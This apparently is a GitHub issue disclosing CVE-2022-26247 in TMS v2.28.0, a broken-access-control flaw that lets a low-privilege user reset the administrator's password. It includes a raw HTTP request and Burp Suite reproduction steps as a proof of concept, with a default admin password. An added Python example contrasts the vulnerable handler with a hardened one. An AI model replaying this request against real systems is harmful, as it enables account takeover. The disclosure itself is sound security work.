CVE-2022-26247: There is an Insecure Permissions vulnerability in tms · Issue #16 · xiweicheng/tms
TMS v2.28.0 contains an insecure permissions vulnerability via the component /TMS/admin/user/Update2. This vulnerability allows attackers to modify the administrator account and password.
[Suggested description]
There is an ultra vires vulnerability in the function for modifying personal information in TMS. The vulnerability originates from /TMS/admin/user/Update2. The administrator account and password can be modified beyond the user's authority by modifying the packet parameters.
[Vulnerability Type]
Insecure Permissions
[Vendor of Product]
https://github.com/xiweicheng/tms
[Affected Product Code Base]
v2.28.0
[Affected Component]
POST /tms/admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 66
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645604534
Connection: close

username=admin&password=88888888&name=admin&mail=admin%40google.com&=
[Attack Type]
Remote
[Vulnerability proof]
1. Access http://localhost:8080/tms/admin with the test account.
2. In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888.
Now I log in to the test account to try to change the information and password of the admin account.
3. Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.
4. Because there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the Burp Suite packet capturing proxy -> click the confirm submit button.
5. Modify the packet capture data, as shown in the following figure.
6. Click Forward to finish the modification.
Viewing the admin account shows that its information has changed. Vulnerability reproduction completed.
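The two missing checks described above (no object-level authorization on the `username` parameter, and no verification of the original password) are modelled below as an added example. It is not code from the TMS project: the in-memory user store, the `oldPassword` field, the `ROLE_ADMIN` role name and the function names are assumptions for illustration, and the accounts are constructed.

```python
import hashlib
import hmac
import os
from urllib.parse import parse_qs

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_user(password, roles):
    salt = os.urandom(16)
    return {"salt": salt, "hash": _hash(password, salt), "roles": set(roles)}

def check(users, name, password):
    u = users[name]
    return hmac.compare_digest(_hash(password, u["salt"]), u["hash"])

def _form(body):
    return {k: v[0] for k, v in parse_qs(body).items()}

def update2_vulnerable(users, session_user, body):
    # Behaviour the report describes: the target account is taken from the
    # request body and the caller's current password is never checked.
    form = _form(body)
    target = users[form["username"]]
    target["hash"] = _hash(form["password"], target["salt"])
    return 200

def update2_hardened(users, session_user, body):
    form = _form(body)
    if "password" not in form:
        return 400
    caller = users[session_user]
    target_name = form.get("username", session_user)
    # 1. Object-level authorization: only the session's own account may be
    #    changed, unless the caller holds the (assumed) admin role.
    if target_name != session_user and "ROLE_ADMIN" not in caller["roles"]:
        return 403
    # 2. Re-authentication: the caller must supply their own current password.
    if not check(users, session_user, form.get("oldPassword", "")):
        return 403
    if target_name not in users:
        return 404
    target = users[target_name]
    target["hash"] = _hash(form["password"], target["salt"])
    return 200

if __name__ == "__main__":
    # Constructed accounts mirroring the report's admin and test users.
    users = {"admin": make_user("88888888", ["ROLE_ADMIN"]),
             "test": make_user("test-pass", ["ROLE_USER"])}
    body = "username=admin&password=change123&name=admin&mail=admin%40google.com&="
    print(update2_hardened(users, "test", body))
```
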